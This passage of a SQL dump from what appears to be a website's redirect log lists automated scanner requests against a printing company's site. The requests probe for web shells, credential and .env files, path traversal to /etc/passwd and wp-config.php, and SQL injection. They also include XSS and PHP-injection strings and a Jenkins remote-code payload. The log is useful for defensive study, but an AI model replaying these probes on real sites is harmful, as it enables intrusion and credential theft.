00:00:00',301),(23742,'https://ekvatorprint.com.ua/site/wp-content/plugins/dos2unix/dos2unix.php',NULL,'','',2,0,'2022-06-14 06:00:03','0000-00-00 00:00:00',301),(23743,'https://ekvatorprint.com.ua/blog/wp-content/plugins/dos2unix/dos2unix.php',NULL,'','',2,0,'2022-06-14 06:00:03','0000-00-00 00:00:00',301),(23744,'https://ekvatorprint.com.ua/kontakt.html',NULL,'','',1,0,'2022-06-14 17:18:29','0000-00-00 00:00:00',301),(23745,'https://ekvatorprint.com.ua/environments/environment.ts',NULL,'','',2,0,'2022-06-16 11:27:07','0000-00-00 00:00:00',301),(23746,'https://ekvatorprint.com.ua/src/environments/environment.ts',NULL,'','',2,0,'2022-06-16 19:39:45','0000-00-00 00:00:00',301),(23747,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/accesson.php',NULL,'','',1,0,'2022-06-18 20:23:07','0000-00-00 00:00:00',301),(23748,'https://ekvatorprint.com.ua/_profiler/empty/search/results',NULL,'','',1,0,'2022-06-19 00:06:41','0000-00-00 00:00:00',301),(23749,'https://ekvatorprint.com.ua/printing-on-vinyl@20',NULL,'','',1,0,'2022-06-19 03:54:56','0000-00-00 00:00:00',301),(23750,'https://ekvatorprint.com.ua/equipment@20',NULL,'','',1,0,'2022-06-19 04:04:28','0000-00-00 00:00:00',301),(23751,'https://ekvatorprint.com.ua/preview.php?/albums/&preview=elementary/a:<?=print(43543534534-567567567);?>',NULL,'','',1,0,'2022-06-20 03:13:18','0000-00-00 00:00:00',301),(23752,'https://ekvatorprint.com.ua//wp-includes/id3/license.txt',NULL,'','',7,0,'2022-06-22 05:25:49','0000-00-00 00:00:00',301),(23753,'https://ekvatorprint.com.ua/wp-content/plugins/jquery-html5-file-upload/readme.txt',NULL,'','',1,0,'2022-06-23 11:58:11','0000-00-00 00:00:00',301),(23754,'https://ekvatorprint.com.ua/wp-content/plugins/background-image-cropper/image/ico/accesson.php',NULL,'','',1,0,'2022-06-24 13:45:58','0000-00-00 00:00:00',301),(23755,'https://ekvatorprint.com.ua/phpdebugbar',NULL,'','',2,0,'2022-06-24 19:29:36','0000-00-00 00:00:00',301),(23756,'https://ekvatorprint.com.ua/wp-content/plugins/page-flip-image-gallery/upload.php',NULL,'','',1,0,'2022-06-26 15:33:31','0000-00-00 00:00:00',301),(23757,'https://ekvatorprint.com.ua/inbexw.php',NULL,'www.google.com','',1,0,'2022-06-27 17:55:44','0000-00-00 00:00:00',301),(23758,'https://ekvatorprint.com.ua/wp-content/plugins/apikey/nocap.php',NULL,'www.google.com','',1,0,'2022-06-27 17:55:50','0000-00-00 00:00:00',301),(23759,'https://ekvatorprint.com.ua/images/mod_config.php',NULL,'www.google.com','',1,0,'2022-06-27 17:56:04','0000-00-00 00:00:00',301),(23760,'https://ekvatorprint.com.ua/xl33t.php',NULL,'www.google.com','',1,0,'2022-06-27 17:56:22','0000-00-00 00:00:00',301),(23761,'https://ekvatorprint.com.ua/wp-content/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:56:37','0000-00-00 00:00:00',301),(23762,'https://ekvatorprint.com.ua/wordpress/wp-content/themes/twentyfive/include.php',NULL,'www.google.com','',1,0,'2022-06-27 17:56:46','0000-00-00 00:00:00',301),(23763,'https://ekvatorprint.com.ua/wp-admin/images/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:56:59','0000-00-00 00:00:00',301),(23764,'https://ekvatorprint.com.ua/wp-admin/maint/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:57:07','0000-00-00 00:00:00',301),(23765,'https://ekvatorprint.com.ua/wp-admin/meta/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:57:14','0000-00-00 00:00:00',301),(23766,'https://ekvatorprint.com.ua/wp-admin/network/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:57:22','0000-00-00 00:00:00',301),(23767,'https://ekvatorprint.com.ua/wp-admin/user/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:57:29','0000-00-00 00:00:00',301),(23768,'https://ekvatorprint.com.ua/wp-admin/includes/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:57:36','0000-00-00 00:00:00',301),(23769,'https://ekvatorprint.com.ua/wp-admin/css/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:57:43','0000-00-00 00:00:00',301),(23770,'https://ekvatorprint.com.ua/wp-includes/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:57:57','0000-00-00 00:00:00',301),(23771,'https://ekvatorprint.com.ua/wp-content/uploads/xleet.php',NULL,'www.google.com','',1,0,'2022-06-27 17:58:04','0000-00-00 00:00:00',301),(23772,'https://ekvatorprint.com.ua/wp-vatva.php',NULL,'www.google.com','',1,0,'2022-06-27 17:58:18','0000-00-00 00:00:00',301),(23773,'https://ekvatorprint.com.ua/1975.php',NULL,'www.google.com','',1,0,'2022-06-27 17:58:37','0000-00-00 00:00:00',301),(23774,'https://ekvatorprint.com.ua/vabba.php',NULL,'www.google.com','',1,0,'2022-06-27 17:58:45','0000-00-00 00:00:00',301),(23775,'https://ekvatorprint.com.ua/qws.php',NULL,'www.google.com','',1,0,'2022-06-27 17:58:51','0000-00-00 00:00:00',301),(23776,'https://ekvatorprint.com.ua/content.php',NULL,'www.google.com','',5,0,'2022-06-27 17:59:57','0000-00-00 00:00:00',301),(23777,'https://ekvatorprint.com.ua/new-index.php',NULL,'www.google.com','',3,0,'2022-06-27 18:00:05','0000-00-00 00:00:00',301),(23778,'https://ekvatorprint.com.ua/wp-includes/images/media/about.php',NULL,'www.google.com','',1,0,'2022-06-27 18:00:21','0000-00-00 00:00:00',301),(23779,'https://ekvatorprint.com.ua/wp-content/languages/themes/radio.php',NULL,'www.google.com','',1,0,'2022-06-27 18:00:29','0000-00-00 00:00:00',301),(23780,'https://ekvatorprint.com.ua/wp-includes/text/diff/content.php',NULL,'www.google.com','',1,0,'2022-06-27 18:00:37','0000-00-00 00:00:00',301),(23781,'https://ekvatorprint.com.ua/wp-includes/text/diff/radio.php',NULL,'www.google.com','',1,0,'2022-06-27 18:00:53','0000-00-00 00:00:00',301),(23782,'https://ekvatorprint.com.ua/wp-includes/images/media/new-index.php',NULL,'www.google.com','',1,0,'2022-06-27 18:01:02','0000-00-00 00:00:00',301),(23783,'https://ekvatorprint.com.ua/wp-content/themes/twentytwenty/content.php',NULL,'www.google.com','',1,0,'2022-06-27 18:01:21','0000-00-00 00:00:00',301),(23784,'https://ekvatorprint.com.ua/wp-includes/images/wlw/content.php',NULL,'www.google.com','',1,0,'2022-06-27 18:01:29','0000-00-00 00:00:00',301),(23785,'https://ekvatorprint.com.ua/wp-content/themes/zakra/image.php',NULL,'www.google.com','',1,0,'2022-06-27 18:01:45','0000-00-00 00:00:00',301),(23786,'https://ekvatorprint.com.ua/cgi-etc/quti.php?pass=shell',NULL,'www.google.com','',1,0,'2022-06-27 18:01:53','0000-00-00 00:00:00',301),(23787,'https://ekvatorprint.com.ua/varb.php',NULL,'www.google.com','',1,0,'2022-06-27 18:02:02','0000-00-00 00:00:00',301),(23788,'https://ekvatorprint.com.ua/baindex.php',NULL,'www.google.com','',3,0,'2022-06-27 18:02:18','0000-00-00 00:00:00',301),(23789,'https://ekvatorprint.com.ua/qindex.php',NULL,'www.google.com','',4,0,'2022-06-27 18:02:27','0000-00-00 00:00:00',301),(23790,'https://ekvatorprint.com.ua/wp-signin.php',NULL,'www.google.com','',10,0,'2022-06-27 18:02:36','0000-00-00 00:00:00',301),(23791,'https://ekvatorprint.com.ua/wp-includes/css/',NULL,'www.google.com','',1,0,'2022-06-27 18:04:29','0000-00-00 00:00:00',301),(23792,'https://ekvatorprint.com.ua/wp-includes/images/',NULL,'www.google.com','',1,0,'2022-06-27 18:04:38','0000-00-00 00:00:00',301),(23793,'https://ekvatorprint.com.ua/wp-admin/maint/',NULL,'www.google.com','',1,0,'2022-06-27 18:04:45','0000-00-00 00:00:00',301),(23794,'https://ekvatorprint.com.ua/wp-admin/network/',NULL,'www.google.com','',1,0,'2022-06-27 18:04:52','0000-00-00 00:00:00',301),(23795,'https://ekvatorprint.com.ua/upload/image/',NULL,'www.google.com','',1,0,'2022-06-27 18:05:10','0000-00-00 00:00:00',301),(23796,'https://ekvatorprint.com.ua/wp-content/plugins/ubh/',NULL,'www.google.com','',1,0,'2022-06-27 18:05:16','0000-00-00 00:00:00',301),(23797,'https://ekvatorprint.com.ua/wp-content/languages/',NULL,'www.google.com','',1,0,'2022-06-27 18:05:23','0000-00-00 00:00:00',301),(23798,'https://ekvatorprint.com.ua/cgi-etc/',NULL,'www.google.com','',1,0,'2022-06-27 18:05:36','0000-00-00 00:00:00',301),(23799,'https://ekvatorprint.com.ua/wp-content/plugins/apikey/',NULL,'www.google.com','',1,0,'2022-06-27 18:05:43','0000-00-00 00:00:00',301),(23800,'https://ekvatorprint.com.ua/ywhwnaqudo2dhlehown',NULL,'','',1,0,'2022-06-30 01:59:20','0000-00-00 00:00:00',301),(23801,'https://ekvatorprint.com.ua/jst10x.php?v36437=346548',NULL,'','',1,0,'2022-06-30 19:40:00','0000-00-00 00:00:00',301),(23802,'https://ekvatorprint.com.ua/wp-coreutils.php?v36437=346548',NULL,'','',1,0,'2022-06-30 19:40:00','0000-00-00 00:00:00',301),(23803,'https://ekvatorprint.com.ua/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css',NULL,'','',1,0,'2022-06-30 21:36:40','0000-00-00 00:00:00',301),(23804,'https://ekvatorprint.com.ua/environments/.credentials',NULL,'','',1,0,'2022-07-02 09:25:00','0000-00-00 00:00:00',301),(23805,'https://ekvatorprint.com.ua/environments/.aws/.credentials',NULL,'','',1,0,'2022-07-02 20:17:06','0000-00-00 00:00:00',301),(23806,'https://ekvatorprint.com.ua/wp-content/plugins/uploadify/readme.txt',NULL,'','',1,0,'2022-07-03 15:45:59','0000-00-00 00:00:00',301),(23807,'https://ekvatorprint.com.ua/anvxmurc.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-04 20:41:33','0000-00-00 00:00:00',301),(23808,'https://ekvatorprint.com.ua/wp-content/plugins/uploadify/includes/check.php',NULL,'','',1,0,'2022-07-05 07:07:25','0000-00-00 00:00:00',301),(23809,'https://ekvatorprint.com.ua/wp-content/plugins/ccslider/includes/upload.php',NULL,'','',1,0,'2022-07-06 10:17:42','0000-00-00 00:00:00',301),(23810,'https://ekvatorprint.com.ua/i9nrjs20b7oz6arbqt6uj',NULL,'','',1,0,'2022-07-07 18:54:07','0000-00-00 00:00:00',301),(23811,'https://ekvatorprint.com.ua/privacy.html',NULL,'','',1,0,'2022-07-08 01:31:11','0000-00-00 00:00:00',301),(23812,'https://ekvatorprint.com.ua/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php',NULL,'','',1,0,'2022-07-09 08:00:14','0000-00-00 00:00:00',301),(23813,'https://ekvatorprint.com.ua/.aws.credentials',NULL,'','',1,0,'2022-07-09 10:11:11','0000-00-00 00:00:00',301),(23814,'https://ekvatorprint.com.ua/.env.credentials',NULL,'','',1,0,'2022-07-09 16:16:28','0000-00-00 00:00:00',301),(23815,'https://ekvatorprint.com.ua/wp-content/plugins/lbg-bottom-playlist-videoplayer/js/uploadify/uploadify.css',NULL,'','',1,0,'2022-07-11 07:33:45','0000-00-00 00:00:00',301),(23816,'https://ekvatorprint.com.ua/kezcjpfx.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-12 13:17:38','0000-00-00 00:00:00',301),(23817,'https://ekvatorprint.com.ua/kwiyrsha.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-12 18:10:57','0000-00-00 00:00:00',301),(23818,'https://ekvatorprint.com.ua/wp-content/uploads/wp-stream.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',4,0,'2022-07-12 20:15:45','0000-00-00 00:00:00',301),(23819,'https://ekvatorprint.com.ua/wp-content/uploads/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',4,0,'2022-07-12 20:15:45','0000-00-00 00:00:00',301),(23820,'https://ekvatorprint.com.ua/wp-blockup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',3,0,'2022-07-12 20:15:45','0000-00-00 00:00:00',301),(23821,'https://ekvatorprint.com.ua/wp-beckup.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',4,0,'2022-07-12 20:15:45','0000-00-00 00:00:00',301),(23822,'https://ekvatorprint.com.ua/wp-stream.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',3,0,'2022-07-12 20:15:45','0000-00-00 00:00:00',301),(23823,'https://ekvatorprint.com.ua/wp-content/uploads/wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',4,0,'2022-07-12 20:15:46','0000-00-00 00:00:00',301),(23824,'https://ekvatorprint.com.ua/wp-blockdown.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',3,0,'2022-07-12 20:15:46','0000-00-00 00:00:00',301),(23825,'https://ekvatorprint.com.ua/wp-blog-post.php?lt=503c138bd956ccbe9a63967ef1f22dac&a=zwnobya0mdk3mjmqmja7',NULL,'','',3,0,'2022-07-12 20:15:47','0000-00-00 00:00:00',301),(23826,'https://ekvatorprint.com.ua/gvjmrplj.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-13 00:15:33','0000-00-00 00:00:00',301),(23827,'https://ekvatorprint.com.ua/aqqnroda.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-13 18:04:45','0000-00-00 00:00:00',301),(23828,'https://ekvatorprint.com.ua/pme/database/pme/phinx.yml',NULL,'','',1,0,'2022-07-14 00:13:13','0000-00-00 00:00:00',301),(23829,'https://ekvatorprint.com.ua/a/b/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',NULL,'','',1,0,'2022-07-14 00:13:14','0000-00-00 00:00:00',301),(23830,'https://ekvatorprint.com.ua/_ignition/health-check',NULL,'','',1,0,'2022-07-14 00:13:14','0000-00-00 00:00:00',301),(23831,'https://ekvatorprint.com.ua/http_header.php',NULL,'','',1,0,'2022-07-14 00:13:16','0000-00-00 00:00:00',301),(23832,'https://ekvatorprint.com.ua/gsearch.php.en?prod=\';prompt`document.domain`;//',NULL,'','',1,0,'2022-07-14 00:13:17','0000-00-00 00:00:00',301),(23833,'https://ekvatorprint.com.ua/download.do?file=../../../../config.text',NULL,'','',1,0,'2022-07-14 00:13:18','0000-00-00 00:00:00',301),(23834,'https://ekvatorprint.com.ua/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.workflow.cps.cpsflowdefinition/checkscriptcompile?value=@grabconfig(disablechecksums=true)\n@grabresolver(name=\'test\', root=\'http://aaa\')\n@grab(group=\'package\', module=\'vulntest\', version=\'1\')\nimport payload;',NULL,'','',1,0,'2022-07-14 00:38:49','0000-00-00 00:00:00',301),(23835,'https://ekvatorprint.com.ua/cache/accesson0.php',NULL,'','',1,0,'2022-07-14 00:59:41','0000-00-00 00:00:00',301),(23836,'https://ekvatorprint.com.ua/qokuywhb.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-14 01:54:50','0000-00-00 00:00:00',301),(23837,'https://ekvatorprint.com.ua/ixdfuqrb.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-14 03:46:23','0000-00-00 00:00:00',301),(23838,'https://ekvatorprint.com.ua/admin/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-07-14 04:04:35','0000-00-00 00:00:00',301),(23839,'https://ekvatorprint.com.ua/rlrlkfxk.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-14 09:59:50','0000-00-00 00:00:00',301),(23840,'https://ekvatorprint.com.ua/price/media/plg_jchoptimize/cache/js/53d43eba350faf336c4435b97dd4b263.js',NULL,'http://ekvatorprint.com.ua','',2,0,'2022-07-14 10:11:18','0000-00-00 00:00:00',301),(23841,'https://ekvatorprint.com.ua/price/media/plg_content_mavikthumbnails/slimbox2/js/slimbox2.js',NULL,'http://ekvatorprint.com.ua','',2,0,'2022-07-14 10:11:19','0000-00-00 00:00:00',301),(23842,'https://ekvatorprint.com.ua/price/media/plg_jchoptimize/js/ls.loader.js',NULL,'http://ekvatorprint.com.ua','',2,0,'2022-07-14 10:11:20','0000-00-00 00:00:00',301),(23843,'https://ekvatorprint.com.ua/price/media/plg_jchoptimize/js/lazysizes.js',NULL,'http://ekvatorprint.com.ua','',2,0,'2022-07-14 10:11:21','0000-00-00 00:00:00',301),(23844,'https://ekvatorprint.com.ua/price/media/plg_jchoptimize/cache/js/8330cd231e6a939f150bb6586c92aa7f.js',NULL,'http://ekvatorprint.com.ua','',2,0,'2022-07-14 10:11:22','0000-00-00 00:00:00',301),(23845,'https://ekvatorprint.com.ua/cloud-config.yml',NULL,'','',1,0,'2022-07-14 11:07:14','0000-00-00 00:00:00',301),(23846,'https://ekvatorprint.com.ua/core-cloud-config.yml',NULL,'','',1,0,'2022-07-14 11:07:14','0000-00-00 00:00:00',301),(23847,'https://ekvatorprint.com.ua/wp-admin/index.php',NULL,'','',1,0,'2022-07-14 11:33:20','0000-00-00 00:00:00',301),(23848,'https://ekvatorprint.com.ua/uploads/user',NULL,'','',1,0,'2022-07-14 11:36:50','0000-00-00 00:00:00',301),(23849,'https://ekvatorprint.com.ua/wls-wsat/coordinatorporttype',NULL,'','',2,0,'2022-07-14 13:05:32','0000-00-00 00:00:00',301),(23850,'https://ekvatorprint.com.ua/config/initializers/secret_token.rb',NULL,'','',1,0,'2022-07-14 21:38:12','0000-00-00 00:00:00',301),(23851,'https://ekvatorprint.com.ua/config/secrets.yml',NULL,'','',1,0,'2022-07-14 21:38:12','0000-00-00 00:00:00',301),(23852,'https://ekvatorprint.com.ua/.secrets',NULL,'','',1,0,'2022-07-14 21:38:13','0000-00-00 00:00:00',301),(23853,'https://ekvatorprint.com.ua/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-07-14 21:55:58','0000-00-00 00:00:00',301),(23854,'https://ekvatorprint.com.ua/lpcsohaj.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-14 22:37:03','0000-00-00 00:00:00',301),(23855,'https://ekvatorprint.com.ua/yefksdzl.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-15 04:10:18','0000-00-00 00:00:00',301),(23856,'https://ekvatorprint.com.ua/plus/ajax_street.php?act=key&key=錦\' union select 1,2,3,4,5,6,7,md5(999999999),9#',NULL,'','',1,0,'2022-07-15 09:19:56','0000-00-00 00:00:00',301),(23857,'https://ekvatorprint.com.ua/backup/auto.php?password=nzbwpqsdby06dngnoteo2wdgiekm7j4n&path=../backup/auto.php',NULL,'','',1,0,'2022-07-15 09:19:59','0000-00-00 00:00:00',301),(23858,'https://ekvatorprint.com.ua/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null',NULL,'','',1,0,'2022-07-15 09:21:36','0000-00-00 00:00:00',301),(23859,'https://ekvatorprint.com.ua/interface/main/main_screen.php?auth=login&site=default',NULL,'','',1,0,'2022-07-15 09:21:59','0000-00-00 00:00:00',301),(23860,'https://ekvatorprint.com.ua/+cscoe+/session_password.html',NULL,'','',1,0,'2022-07-15 09:26:37','0000-00-00 00:00:00',301),(23861,'https://ekvatorprint.com.ua/_users/org.couchdb.user:poc',NULL,'','',1,0,'2022-07-15 09:28:57','0000-00-00 00:00:00',301),(23862,'https://ekvatorprint.com.ua/wp-content/plugins/w3-total-cache/pub/sns.php',NULL,'','',1,0,'2022-07-15 12:12:40','0000-00-00 00:00:00',301),(23863,'https://ekvatorprint.com.ua/wp-content/plugins/contus-hd-flv-player/uploadvideo.php',NULL,'','',1,0,'2022-07-15 15:34:56','0000-00-00 00:00:00',301),(23864,'https://ekvatorprint.com.ua/udvaftdtfmqow7ru',NULL,'','',1,0,'2022-07-16 01:52:04','0000-00-00 00:00:00',301),(23865,'https://ekvatorprint.com.ua/credentials/.env',NULL,'','',1,0,'2022-07-16 10:00:41','0000-00-00 00:00:00',301),(23866,'https://ekvatorprint.com.ua/xampp/phpinfo.php',NULL,'','',1,0,'2022-07-16 11:24:53','0000-00-00 00:00:00',301),(23867,'https://ekvatorprint.com.ua/.environments',NULL,'','',1,0,'2022-07-16 19:16:37','0000-00-00 00:00:00',301),(23868,'https://ekvatorprint.com.ua/zbilakntkhdame.php',NULL,'','',1,0,'2022-07-17 03:00:43','0000-00-00 00:00:00',301),(23869,'https://ekvatorprint.com.ua/1337.php',NULL,'','',4,0,'2022-07-17 03:01:18','0000-00-00 00:00:00',301),(23870,'https://ekvatorprint.com.ua/am.php',NULL,'','',2,0,'2022-07-17 03:03:19','0000-00-00 00:00:00',301),(23871,'https://ekvatorprint.com.ua/blog.php',NULL,'','',4,0,'2022-07-17 03:03:42','0000-00-00 00:00:00',301),(23872,'https://ekvatorprint.com.ua/blog/fw.php',NULL,'','',3,0,'2022-07-17 03:03:47','0000-00-00 00:00:00',301),(23873,'https://ekvatorprint.com.ua/contacts.php',NULL,'','',2,0,'2022-07-17 03:03:59','0000-00-00 00:00:00',301),(23874,'https://ekvatorprint.com.ua/demo328/fw.php',NULL,'','',2,0,'2022-07-17 03:04:13','0000-00-00 00:00:00',301),(23875,'https://ekvatorprint.com.ua/gel4y.php',NULL,'','',2,0,'2022-07-17 03:04:51','0000-00-00 00:00:00',301),(23876,'https://ekvatorprint.com.ua/gif.php',NULL,'','',2,0,'2022-07-17 03:04:52','0000-00-00 00:00:00',301),(23877,'https://ekvatorprint.com.ua/goods.php',NULL,'','',4,0,'2022-07-17 03:04:54','0000-00-00 00:00:00',301),(23878,'https://ekvatorprint.com.ua/images/about.php',NULL,'','',4,0,'2022-07-17 03:05:20','0000-00-00 00:00:00',301),(23879,'https://ekvatorprint.com.ua/images/sym.php',NULL,'','',2,0,'2022-07-17 03:05:30','0000-00-00 00:00:00',301),(23880,'https://ekvatorprint.com.ua/lab.php',NULL,'','',2,0,'2022-07-17 03:05:47','0000-00-00 00:00:00',301),(23881,'https://ekvatorprint.com.ua/leaf_mailer.php',NULL,'','',2,0,'2022-07-17 03:05:55','0000-00-00 00:00:00',301),(23882,'https://ekvatorprint.com.ua/leaf_php.php',NULL,'','',2,0,'2022-07-17 03:06:00','0000-00-00 00:00:00',301),(23883,'https://ekvatorprint.com.ua/leafmailer.php',NULL,'','',2,0,'2022-07-17 03:06:03','0000-00-00 00:00:00',301),(23884,'https://ekvatorprint.com.ua/mailer1.php',NULL,'','',2,0,'2022-07-17 03:06:29','0000-00-00 00:00:00',301),(23885,'https://ekvatorprint.com.ua/mari.php',NULL,'','',4,0,'2022-07-17 03:06:32','0000-00-00 00:00:00',301),(23886,'https://ekvatorprint.com.ua/ms.php',NULL,'','',2,0,'2022-07-17 03:06:50','0000-00-00 00:00:00',301),(23887,'https://ekvatorprint.com.ua/server.php',NULL,'','',2,0,'2022-07-17 03:07:53','0000-00-00 00:00:00',301),(23888,'https://ekvatorprint.com.ua/sindex.php',NULL,'','',2,0,'2022-07-17 03:08:09','0000-00-00 00:00:00',301),(23889,'https://ekvatorprint.com.ua/srx.php',NULL,'','',2,0,'2022-07-17 03:08:16','0000-00-00 00:00:00',301),(23890,'https://ekvatorprint.com.ua/swm.php',NULL,'','',2,0,'2022-07-17 03:08:20','0000-00-00 00:00:00',301),(23891,'https://ekvatorprint.com.ua/tuco.php',NULL,'','',2,0,'2022-07-17 03:08:35','0000-00-00 00:00:00',301),(23892,'https://ekvatorprint.com.ua/unix.php',NULL,'','',2,0,'2022-07-17 03:08:45','0000-00-00 00:00:00',301),(23893,'https://ekvatorprint.com.ua/wp-admin/css/colors/coffee/fw.php',NULL,'','',2,0,'2022-07-17 03:09:21','0000-00-00 00:00:00',301),(23894,'https://ekvatorprint.com.ua/wp-admin/css/fw.php',NULL,'','',4,0,'2022-07-17 03:09:24','0000-00-00 00:00:00',301),(23895,'https://ekvatorprint.com.ua/wp-admin/includes/class-wp-media-list-data.php',NULL,'','',4,0,'2022-07-17 03:09:29','0000-00-00 00:00:00',301),(23896,'https://ekvatorprint.com.ua/wp-admin/includes/fw.php',NULL,'','',2,0,'2022-07-17 03:09:30','0000-00-00 00:00:00',301),(23897,'https://ekvatorprint.com.ua/wp-admin/maint/about.php',NULL,'','',4,0,'2022-07-17 03:09:35','0000-00-00 00:00:00',301),(23898,'https://ekvatorprint.com.ua/wp-admin/maint/fw.php',NULL,'','',2,0,'2022-07-17 03:09:40','0000-00-00 00:00:00',301),(23899,'https://ekvatorprint.com.ua/wp-admin/shell.php',NULL,'','',2,0,'2022-07-17 03:09:47','0000-00-00 00:00:00',301),(23900,'https://ekvatorprint.com.ua/wp-admin/x.php',NULL,'','',2,0,'2022-07-17 03:09:51','0000-00-00 00:00:00',301),(23901,'https://ekvatorprint.com.ua/wp-content/about.php',NULL,'','',4,0,'2022-07-17 03:09:58','0000-00-00 00:00:00',301),(23902,'https://ekvatorprint.com.ua/wp-content/wp.php',NULL,'','',4,0,'2022-07-17 03:10:10','0000-00-00 00:00:00',301),(23903,'https://ekvatorprint.com.ua/wp-content/x.php',NULL,'','',4,0,'2022-07-17 03:10:15','0000-00-00 00:00:00',301),(23904,'https://ekvatorprint.com.ua/wp-file.php',NULL,'','',4,0,'2022-07-17 03:10:24','0000-00-00 00:00:00',301),(23905,'https://ekvatorprint.com.ua/wp-mna.php',NULL,'','',2,0,'2022-07-17 03:10:40','0000-00-00 00:00:00',301),(23906,'https://ekvatorprint.com.ua/wp-uploads.php',NULL,'','',4,0,'2022-07-17 03:10:48','0000-00-00 00:00:00',301),(23907,'https://ekvatorprint.com.ua/wp2.php',NULL,'','',4,0,'2022-07-17 03:11:00','0000-00-00 00:00:00',301),(23908,'https://ekvatorprint.com.ua/wpx.php',NULL,'','',2,0,'2022-07-17 03:11:13','0000-00-00 00:00:00',301),(23909,'https://ekvatorprint.com.ua/xmrlpc.php',NULL,'','',3,0,'2022-07-17 03:11:52','0000-00-00 00:00:00',301),(23910,'https://ekvatorprint.com.ua/xz.php',NULL,'','',2,0,'2022-07-17 03:11:59','0000-00-00 00:00:00',301),(23911,'https://ekvatorprint.com.ua/yuuki.php',NULL,'','',2,0,'2022-07-17 03:12:06','0000-00-00 00:00:00',301),(23912,'https://ekvatorprint.com.ua/wp-content/plugins/contus-video-galleryversion-10/upload1.php',NULL,'','',1,0,'2022-07-17 04:11:26','0000-00-00 00:00:00',301),(23913,'https://ekvatorprint.com.ua/lmeokmrq.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-07-17 18:36:12','0000-00-00 00:00:00',301),(23914,'https://ekvatorprint.com.ua/wp-content/plugins/html5avmanager/lib/uploadify/uploadify.css',NULL,'','',1,0,'2022-07-18 15:04:41','0000-00-00 00:00:00',301),(23915,'https://ekvatorprint.com.ua/makhdamxehadshell.php',NULL,'','',1,0,'2022-07-19 10:20:15','0000-00-00 00:00:00',301),(23916,'https://ekvatorprint.com.ua/wp-content/plugins/mm-forms/includes/doajaxfileupload.php',NULL,'','',1,0,'2022-07-21 13:39:34','0000-00-00 00:00:00',301),(23917,'https://ekvatorprint.com.ua/index.php?data=8\'\'&mode=8\'\'&order=8\'\'&lang=8\'\'&p=8\'\'&key=8\'\'&status=8\'\'&start=8\'\'&charset=8\'\'&description=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:02:48','0000-00-00 00:00:00',301),(23918,'https://ekvatorprint.com.ua/index.php?preview=8\'\'&filter=8\'\'&update=8\'\'&from=8\'\'&view=8\'\'&a=8\'\'&limit=8\'\'&do=8\'\'&plugin=8\'\'&theme=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:02:48','0000-00-00 00:00:00',301),(23919,'https://ekvatorprint.com.ua/index.php?state=8\'\'&query=8\'\'&f=8\'\'&error=8\'\'&save=8\'\'&sort=8\'\'&format=8\'\'&tab=8\'\'&offset=8\'\'&edit=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:02:49','0000-00-00 00:00:00',301),(23920,'https://ekvatorprint.com.ua/index.php?dbname=8\'\'&option=8\'\'&userid=8\'\'&sql=8\'\'&options=8\'\'&address=8\'\'&activated=8\'\'&action2=8\'\'&password2=8\'\'&pass1=8\'\'',NULL,'https://ekvatorprint.com.ua/t?r=%27\'&utm_source=%27\'&_utm_source=%27\'&_utm_campaign=%27\'&_utm_medium=%27\'&_utm_content=%27\'','',1,0,'2022-07-22 04:02:52','0000-00-00 